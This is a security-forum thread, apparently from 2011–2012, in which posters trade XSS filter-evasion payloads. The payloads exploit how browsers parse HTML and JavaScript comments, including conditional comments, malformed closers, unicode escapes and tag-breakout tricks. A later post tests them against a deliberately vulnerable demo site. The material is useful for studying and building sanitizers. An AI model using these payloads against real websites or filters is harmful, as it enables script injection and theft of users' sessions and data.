Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Breaking javascript/html comments
Posted by: jackmasa
Date: August 14, 2011 10:26AM

1.Javascript

IE:<script>/*@cc_on!alert(1)//*/</script>

Chrome:<script>/*猪/alert(3)//*/</script>

All:<script>/ //alert(1)</script>


2.HTML

<img/<!--/src=x:x onerror=alert(2)//-->

<!--[if<img src=x:x onerror=alert(5)//]-->

<!-- --!><img src="x:x" onerror=alert(1)/ />--> chrome firefox

<!-- ><img src="x:x" onerror=alert(1)/ />--> ie opera

Options: ReplyQuote
Re: Breaking javascript/html comments
Posted by: Gareth Heyes
Date: August 14, 2011 05:08PM

The chrome one is really nice!
Why don't you try your luck with jsreg? Lets see those vectors bypassing my sandbox!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Breaking javascript/html comments
Posted by: LeverOne
Date: August 14, 2011 07:40PM

@jackmasa

Good post! Thank you! And twice a good post, if the chrome one is your find.

@Gareth

IE & GC ones are the keys to real bypass the current version of JSReg. Doesn't fix them for a while - show must ... ;)


Quote

I promise not to fix :) Doubt you can do it though :D

This is for those who are just starting to view for your sandbox.

----------------------
~Veritas~



Edited 1 time(s). Last edit at 08/15/2011 07:20AM by LeverOne.

Options: ReplyQuote
Re: Breaking javascript/html comments
Posted by: jackmasa
Date: August 15, 2011 02:02AM

Meet the conditions:
\uxx2a+\u002f

like /*娪/alert(1),娪==\u5a2a
or /*帪/

Options: ReplyQuote
Re: Breaking javascript/html comments
Posted by: Gareth Heyes
Date: August 15, 2011 05:49AM

@jackmasa

Yeah I fuzzed those and noticed :) Nice work. Awesome thread.

Chrome seems to suffer the same problems as opera:
u=alert;
\u(1)

[www.thespanner.co.uk]

@LeverOne

I promise not to fix :) Doubt you can do it though :D

Check this out:-
eval("Object.defineProperty(window,'u661',{get:function(){alert(1)}});\\u61");

Opera and Chrome can't seem to get it quite right lol

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 3 time(s). Last edit at 08/15/2011 06:51AM by Gareth Heyes.

Options: ReplyQuote
Re: Breaking javascript/html comments
Posted by: jackmasa
Date: September 04, 2011 11:31AM

keep play:
<>>//<!/>
alert(1)



Edited 1 time(s). Last edit at 09/04/2011 11:33AM by jackmasa.

Options: ReplyQuote
Re: Breaking javascript/html comments
Posted by: Gareth Heyes
Date: September 04, 2011 01:01PM

Yeah I knew about that one, I think I posted that to slackers ages ago. Nice though :) keep em coming

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Breaking javascript/html comments
Posted by: jackmasa
Date: November 08, 2011 09:25PM

Gareth of trick: <noscript><!-- </noscript> <img src=1 onerror=alert(1)> -->

Options: ReplyQuote
Re: Breaking javascript/html comments
Posted by: jackmasa
Date: November 08, 2011 09:33PM

Superver of trick:
<script><!-- </script> <img src=1 onerror=alert(1)>
the some also:
<style><!-- </style> <img src=1 onerror=alert(1)>
<textarea><!-- </textarea><img src=1 onerror=alert(1)>

Options: ReplyQuote
Re: Breaking javascript/html comments
Posted by: rickm
Date: November 07, 2012 04:44AM

Hi

I'm studying XSS and I'm learning a lot here, you are very good with it. I noticied that many XSS payloads are dependent of specific browsers, however, I tested some of the payloads that you provided for generic browser and they do not work here.

I'm using Firefox and I tested it against the IBM WatchFire that is contructed to be vulnerable.

For example, this basic XSS input works as expected:

http://demo.testfire.net/search.aspx?txtSearch=<script>alert(1)</script>

However all your XSS payloads below are not working. Can you please take a look and if possible provide a working XSS payload for this site? I would love to test / see your payloads working.


<!--[if<img src=x:x onerror=alert(5)//]-->

<!-- --!><img src="x:x" onerror=alert(1)/ />-->

<>>//<!/>
alert(1)

/*娪/alert(1),娪==\u5a2a

u=alert; \u(1)

eval("Object.defineProperty(window,'u661',{get:function(){alert(1)}});\\u61");


I tested all of them (copying and pasting) and also URL-encoding them, but none of them resulted in a alert box. Can someone kidnly please give me a working example against this test page (or any other) for this payloads and in what browser it worked?

Also, for payloads with strange chars (such as 娪), how should we encode it?

Thanks.

Options: ReplyQuote


Sorry, only registered users may post in this forum.